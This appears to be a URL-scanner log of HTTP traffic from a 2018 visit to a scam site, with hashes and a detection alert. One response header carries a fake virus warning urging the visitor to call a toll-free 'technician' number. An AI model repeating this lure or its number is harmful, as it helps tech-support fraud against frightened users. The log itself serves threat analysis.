                                            GET /analytics.js HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
Timing-Allow-Origin: *
Date: Fri, 20 Jul 2018 15:22:10 GMT
Expires: Fri, 20 Jul 2018 17:22:10 GMT
Last-Modified: Fri, 18 May 2018 01:10:24 GMT
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 14386
Cache-Control: public, max-age=7200
Age: 2345
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   14386
Md5:    b3de885583a477d4e31568948d6bebd7
Sha1:   2ce8d853244dde551c41d5207d6f71c567bde8c6
Sha256: e1bb5aa555a0d875e2a67884ceaa0629e08994a8aabadc2fac5b6915793dbf75
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         50.62.22.142
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 20 Jul 2018 16:01:15 GMT
Server: Apache
Content-Length: 328
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   328
Md5:    301fa7ceb5b3c291d4bbeee953048686
Sha1:   758d921efd60d4e9f0f6d77648ccc500c8611fea
Sha256: 6b62a3658ad247e8f30d3e9f35da5e00ffac1ea09785bd1f0a9830f659cf01da
                                        
                                            GET /r/collect?v=1&_v=j68&a=683440925&t=pageview&_s=1&dl=http%3A%2F%2Fbfswqrt.gq%2Ffir%2F&ul=en-us&de=UTF-8&dt=MICROSOFT%20SECURITY%20WARNING&sd=24-bit&sr=1176x885&vp=1168x776&je=1&fl=10.0%20r45&_u=IEBAAUQ~&jid=978258787&gjid=2043602346&cid=1953986344.1532102476&tid=UA-116176892-2&_gid=1988296310.1532102476&_r=1&gtm=u6t&z=51689673 HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Access-Control-Allow-Origin: *
Date: Fri, 20 Jul 2018 16:01:16 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Server: Golfe2
Content-Length: 35
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   35
Md5:    28d6814f309ea289f847c69cf91194c6
Sha1:   0f4e929dd5bb2564f7ab9c76338e04e292a42ace
Sha256: 8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015
                                        
                                            GET /fir/security.php HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/
Cookie: _ga=GA1.2.1953986344.1532102476; _gid=GA1.2.1988296310.1532102476; _gat_gtag_UA_116176892_2=1

                                         
                                         50.62.22.142
HTTP/1.1 401 Unauthorized
Content-Type: text/html; charset=UTF-8
                                        
Date: Fri, 20 Jul 2018 16:01:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
WWW-Authenticate: Basic realm="Suspicious activity detected on your IP address due to harmful virus installed in your computer. Call Toll Free now @ +1-888-348-1617 for any assistance. Your data is at a serious risk.There is a system file missing due to some harmfull virus Debug malware error, system failure. Please contact technicians to rectify the issue.Please do not open internet browser for your security issue to avoid data corruption on your operating system. Please contact technicians at Tollfree Helpline at @ +1-888-348-1617(Toll free) PLEASE DO NOT SHUT DOWN OR RESTART YOUR COMPUTER, DOING THAT MAY LEAD TO DATA LOSS AND FAILURE OF OPERATING SYSTEM , HENCE NON BOOTABLE SITUATION RESULTING COMPLETE DATA LOSS . CONTACT ADMINISTRATOR DEPARTMENT TO RESOLVE THE ISSUE ON TOLL FREE @ +1-888-348-1617"
refresh: 0; url=/fir/security.php
Set-Cookie: PHPSESSID=fqgk3mbcqk1k8ig7g9qo2ob823; path=/
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  HTML document text
Size:   40
Md5:    54a162d53b04d31ce268a35baf244caf
Sha1:   42c48439d4f282db5d8e5e19bf0f41a03fa3f94b
Sha256: 9aeea010b6b29e828ce60611b487c718abf716fa08d2d9eb13ed3a5b0a2f51a6

Alerts:
  urlquery:
    - Scam / Cryptowall detected
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: _ga=GA1.2.1953986344.1532102476; _gid=GA1.2.1988296310.1532102476; _gat_gtag_UA_116176892_2=1; PHPSESSID=fqgk3mbcqk1k8ig7g9qo2ob823

                                         
                                         50.62.22.142
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 20 Jul 2018 16:01:16 GMT
Server: Apache
Content-Length: 328
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   328
Md5:    301fa7ceb5b3c291d4bbeee953048686
Sha1:   758d921efd60d4e9f0f6d77648ccc500c8611fea
Sha256: 6b62a3658ad247e8f30d3e9f35da5e00ffac1ea09785bd1f0a9830f659cf01da
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: _ga=GA1.2.1953986344.1532102476; _gid=GA1.2.1988296310.1532102476; _gat_gtag_UA_116176892_2=1; PHPSESSID=fqgk3mbcqk1k8ig7g9qo2ob823

                                         
                                         50.62.22.142
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 20 Jul 2018 16:01:17 GMT
Server: Apache
Content-Length: 328
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   328
Md5:    301fa7ceb5b3c291d4bbeee953048686
Sha1:   758d921efd60d4e9f0f6d77648ccc500c8611fea
Sha256: 6b62a3658ad247e8f30d3e9f35da5e00ffac1ea09785bd1f0a9830f659cf01da